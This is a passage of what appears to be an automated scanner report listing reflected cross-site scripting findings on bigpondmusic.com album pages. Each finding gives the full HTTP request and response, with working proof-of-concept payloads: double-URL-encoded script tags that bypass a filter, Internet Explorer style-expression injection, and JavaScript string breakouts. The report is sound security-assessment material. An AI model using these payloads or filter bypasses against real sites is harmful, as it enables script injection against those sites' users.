The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8492d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9f6f8063291 was submitted in the REST URL parameter 1. This input was echoed as 8492d"><script>alert(1)</script>9f6f8063291 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /album8492d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9f6f8063291/ke-ha/we-r-who-we-r HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:22:16 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 87992
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of the h request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eba52"style%3d"x%3aexpression(alert(1))"bbd03f69418 was submitted in the h parameter. This input was echoed as eba52"style="x:expression(alert(1))"bbd03f69418 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /album/ke-ha/we-r-who-we-r?h=761402717eba52"style%3d"x%3aexpression(alert(1))"bbd03f69418 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 200 OK Connection: close Date: Tue, 23 Nov 2010 03:22:07 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 105180
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
<title>Ke$ha - We R Who We R - BigP ...[SNIP]... <input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/ke-ha/we-r-who-we-r?h=761402717eba52"style="x:expression(alert(1))"bbd03f69418" /> ...[SNIP]...
2.80. http://bigpondmusic.com/album/ke-ha/we-r-who-we-r [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://bigpondmusic.com
Path:
/album/ke-ha/we-r-who-we-r
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 310e7"style%3d"x%3aexpression(alert(1))"8dd416912c4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 310e7"style="x:expression(alert(1))"8dd416912c4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /album/ke-ha/we-r-who-we-r?310e7"style%3d"x%3aexpression(alert(1))"8dd416912c4=1 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 200 OK Connection: close Date: Tue, 23 Nov 2010 03:21:57 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 105489
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
<title>Ke$ha - We R Who We R - BigP ...[SNIP]... <input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/ke-ha/we-r-who-we-r?310e7"style="x:expression(alert(1))"8dd416912c4=1" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dd5fb'%3bae57aea958d was submitted in the REST URL parameter 1. This input was echoed as dd5fb';ae57aea958d in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /albumdd5fb'%3bae57aea958d/keith-urban/get-closer3 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:22:19 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 88137
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9e9b9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e81b0a7b047a was submitted in the REST URL parameter 1. This input was echoed as 9e9b9"><script>alert(1)</script>81b0a7b047a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /album9e9b9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e81b0a7b047a/keith-urban/get-closer3 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:22:15 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 88248
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
2.83. http://bigpondmusic.com/album/keith-urban/get-closer3 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://bigpondmusic.com
Path:
/album/keith-urban/get-closer3
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aedb7"style%3d"x%3aexpression(alert(1))"7aaa14c0b57 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as aedb7"style="x:expression(alert(1))"7aaa14c0b57 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /album/keith-urban/get-closer3?aedb7"style%3d"x%3aexpression(alert(1))"7aaa14c0b57=1 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 200 OK Connection: close Date: Tue, 23 Nov 2010 03:21:56 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 116006
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
<title>Keith Urban - Get Closer - B ...[SNIP]... <input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/keith-urban/get-closer3?aedb7"style="x:expression(alert(1))"7aaa14c0b57=1" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ef448%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb1a2ebf5bfd was submitted in the REST URL parameter 1. This input was echoed as ef448"><script>alert(1)</script>b1a2ebf5bfd in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /albumef448%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb1a2ebf5bfd/kings-of-leon/come-around-sundown HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:18:48 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 88278
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ee02b'%3be0cb5b4004e was submitted in the REST URL parameter 1. This input was echoed as ee02b';e0cb5b4004e in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /albumee02b'%3be0cb5b4004e/kings-of-leon/come-around-sundown HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:18:55 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 88250
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of the h request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 111ac"style%3d"x%3aexpression(alert(1))"f8333a80ae5 was submitted in the h parameter. This input was echoed as 111ac"style="x:expression(alert(1))"f8333a80ae5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /album/kings-of-leon/come-around-sundown?h=756194845111ac"style%3d"x%3aexpression(alert(1))"f8333a80ae5 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 200 OK Connection: close Date: Tue, 23 Nov 2010 03:18:55 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 123596
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
<title>Kings Of Leon - Come Around ...[SNIP]... <input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/kings-of-leon/come-around-sundown?h=756194845111ac"style="x:expression(alert(1))"f8333a80ae5" /> ...[SNIP]...
2.87. http://bigpondmusic.com/album/kings-of-leon/come-around-sundown [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://bigpondmusic.com
Path:
/album/kings-of-leon/come-around-sundown
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7da47"style%3d"x%3aexpression(alert(1))"9e1191b4fee was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7da47"style="x:expression(alert(1))"9e1191b4fee in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /album/kings-of-leon/come-around-sundown?7da47"style%3d"x%3aexpression(alert(1))"9e1191b4fee=1 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 200 OK Connection: close Date: Tue, 23 Nov 2010 03:18:34 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 123679
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
<title>Kings Of Leon - Come Around ...[SNIP]... <input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/kings-of-leon/come-around-sundown?7da47"style="x:expression(alert(1))"9e1191b4fee=1" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dd9a3'%3b41e6347e7d8 was submitted in the REST URL parameter 1. This input was echoed as dd9a3';41e6347e7d8 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /albumdd9a3'%3b41e6347e7d8/mando-diao/mtv-unplugged-above-and-beyond HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:26:33 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 87907
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 34330%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec8207af3af2 was submitted in the REST URL parameter 1. This input was echoed as 34330"><script>alert(1)</script>c8207af3af2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /album34330%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec8207af3af2/mando-diao/mtv-unplugged-above-and-beyond HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:26:30 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 88075
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of the h request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 10ec8"style%3d"x%3aexpression(alert(1))"5d723e85314 was submitted in the h parameter. This input was echoed as 10ec8"style="x:expression(alert(1))"5d723e85314 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /album/mando-diao/mtv-unplugged-above-and-beyond?h=76630773610ec8"style%3d"x%3aexpression(alert(1))"5d723e85314 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 200 OK Connection: close Date: Tue, 23 Nov 2010 03:26:32 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 126887
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
2.91. http://bigpondmusic.com/album/mando-diao/mtv-unplugged-above-and-beyond [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://bigpondmusic.com
Path:
/album/mando-diao/mtv-unplugged-above-and-beyond
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 69935"style%3d"x%3aexpression(alert(1))"58a70fee747 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 69935"style="x:expression(alert(1))"58a70fee747 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /album/mando-diao/mtv-unplugged-above-and-beyond?69935"style%3d"x%3aexpression(alert(1))"58a70fee747=1 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 200 OK Connection: close Date: Tue, 23 Nov 2010 03:26:22 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 126980
